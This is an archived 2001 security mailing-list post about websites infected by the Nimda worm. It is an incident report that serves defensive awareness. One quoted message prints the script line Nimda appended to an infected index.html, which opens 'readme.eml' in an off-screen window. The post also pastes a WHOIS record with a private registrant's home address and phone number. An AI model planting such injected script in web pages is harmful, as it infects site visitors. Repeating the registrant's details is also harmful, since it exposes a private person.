RE: Web site infected by Nimda

From: Ken Pfeil (Kenat_private)
Date: Wed Sep 19 2001 - 10:44:31 PDT

Next message: John Q. Public: "RE: Web site infected by Nimda"

Previous message: Andrew Mulholland: "RE: nimda tries to send mail after reboot"
In reply to: Jac Engel: "RE: Web site infected by Nimda"
Next in thread: John Q. Public: "RE: Web site infected by Nimda"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I'm sure there's thousands of sites affected. No need to list em all here.
As an FYI, wininternals.com is NOT related to Winternals Software. It is
registered to:

Registrant:
 Konstantinos Iatropoulos
 3400 Ovila Hamel
 St. Hubert, Quebec j3y 8p4
 ca

 Domain Name: WININTERNALS.COM

 Administrative Contact:
    Iatropoulos, Konstantinos  costa.sylvia.iatropoulosat_private
    3400 Ovila Hamel
    St. Hubert, Quebec j3y 8p4
    ca
    450 4624930

 Technical Contact:
    Nameback, Hostmaster  dnsat_private
    1001 N. Lake Destiny Road
    Suite 125
    Maitland, FL 32751
    US
    (407) 475-1130

 Billing Contact:
    Billing, Nameback  billingat_private
    1001 N. Lake Destiny Rd. Suite 125
    Maitland, Florida 32751
    US
    407-475-1130


 Record last updated on 18-Sep-2001.
 Record expires on 14-Jun-2002.
 Record Created on 14-Jun-2000.

 Domain servers in listed order:
    NS1.INFOBACK.NET   207.30.43.2
    NS2.INFOBACK.COM   207.30.43.3

> -----Original Message-----
> From: Jac Engel [mailto:jacengelat_private]
> Sent: Wednesday, September 19, 2001 1:07 PM
> To: acz [iSecureLabs]; incidentsat_private
> Subject: RE: Web site infected by Nimda
>
>
> http://www.wininternals.com is also infected by Nimda Virus,
> after the page is loaded  I get a new page
> saying :
> You have encountered the following error while using Windows Media Player:
> ------------------------------------------------------------------
> ----------
> ----
> Error#  8007000D
> Sorry, no more help is available for this problem at this time.
>
> Jac
>
> -----Original Message-----
> From: acz [iSecureLabs] [mailto:aurelien.cabezonat_private]
> Sent: Sunday, September 19, 1999 5:46 PM
> To: incidentsat_private
> Subject: Web site infected by Nimda
>
>
> Hi all,
>
> http://www.digimind.fr/ is infected by Nimda virus !
>
> This line was added at the end of the index.html
>
> ---<cut>---
> <html><script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script></html>
> ---<cut>---
>
> If you wanna visit digimind.fr, turn your webbrowser javascript off !
>
> ---
> Cabezon Aurelien
> http://www.iSecureLabs.com
>
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: John Q. Public: "RE: Web site infected by Nimda"
Previous message: Andrew Mulholland: "RE: nimda tries to send mail after reboot"
In reply to: Jac Engel: "RE: Web site infected by Nimda"
Next in thread: John Q. Public: "RE: Web site infected by Nimda"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 10:47:55 PDT